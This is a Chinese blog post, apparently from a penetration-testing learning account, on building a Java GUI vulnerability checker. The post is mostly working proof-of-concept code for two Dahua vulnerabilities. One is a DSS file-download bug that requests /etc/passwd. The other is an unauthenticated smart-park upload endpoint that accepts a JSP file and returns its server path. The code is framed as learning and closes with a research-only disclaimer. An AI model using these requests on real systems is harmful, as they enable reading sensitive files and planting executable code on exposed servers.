“ 照虎画猫——用WgpSec 说书人师傅的‘用友NC系列检测利用工具’结合本人为数不多的java基础再结合gpt,学习了一下java图形化工具的编写,实现了最基础的漏洞检测功能........”
用大华的两个漏洞为例,分别试了POST请求和GET请求
01
—
大华智慧园区devicePoint_addImgIco文件上传
02
—
大华DSS文件下载漏洞
03、总结
—
凑个字数。。。。。。
public class check {public String checkAction(Map deserializeMap, String vulName, String url) throws IOException {String result;if ("dahua_dss_fileDown".equals(vulName)) {result = dahua_dss_fileDown(url);} else if ("大华智慧园区文件上传".equals(vulName)) {result = zhihuiyuanqu_upload(url);} else if (vulName.contains("xxx")){String path = (String) deserializeMap.get(vulName);result = deserializeAction(url, path, vulName);}else {result = "该poc暂未收录";}return result;}public String dahua_dss_fileDown(String url) {Map<String, String> headers = new HashMap<>();headers.put("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");Response response = null;try {String payload = "portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd";response = httpRequest.get(url + payload,headers);String statusCode = String.valueOf(response.code());String responseBody = response.body().string();if ("200".equals(statusCode) && responseBody.contains("root")) {return "[+] 漏洞存在!!!!";} else {return "[-] 漏洞不存在";}} catch (IOException e) {return "[-]请求失败:" + e.getMessage();} finally {if (response != null) {response.close();}}}public String zhihuiyuanqu_upload(String url) {Map<String, String> headers = new HashMap<>();headers.put("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");// headers.put("Content-Type","multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982");Response response = null;String payload = "emap/devicePoint_addImgIco?hasSubsystem=true";String data = "<%out.println("vultest");%>";RequestBody requestBody = new MultipartBody.Builder().setType(MultipartBody.FORM).addFormDataPart("upload", "a.jsp",RequestBody.create(MediaType.parse("application/octet-stream"), data)).build();System.out.println(requestBody);try {response = httpRequest.post(url + payload,headers,requestBody);// System.out.println(response);String statusCode = String.valueOf(response.code());String responseBody = response.body().string();// System.out.println(responseBody);if ("200".equals(statusCode) && responseBody.contains("on.jsp")) {String pattern = "ico_res_[0-9a-fA-F]+_on.jsp";Pattern r = Pattern.compile(pattern);Matcher m = r.matcher(responseBody);if (m.find()){System.out.println(url+"upload/emap/society_new/"+m.group());}return "[+] 漏洞存在!!!!n"+"文件路径:"+url+"upload/emap/society_new/"+m.group();} else {return "[-] 漏洞不存在";}} catch (IOException e) {return "[-]请求失败:" + e.getMessage();} finally {if (response != null) {response.close();}}}public String deserializeAction(String url, String path, String vulName){return url+vulName+path;}}
大佬的代码:https://github.com/wgpsec/YongYouNcTool
菜鸡的代码:https://github.com/ab0ne/test
原文始发于微信公众号(fly的渗透学习笔记):java图形化工具编写初试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论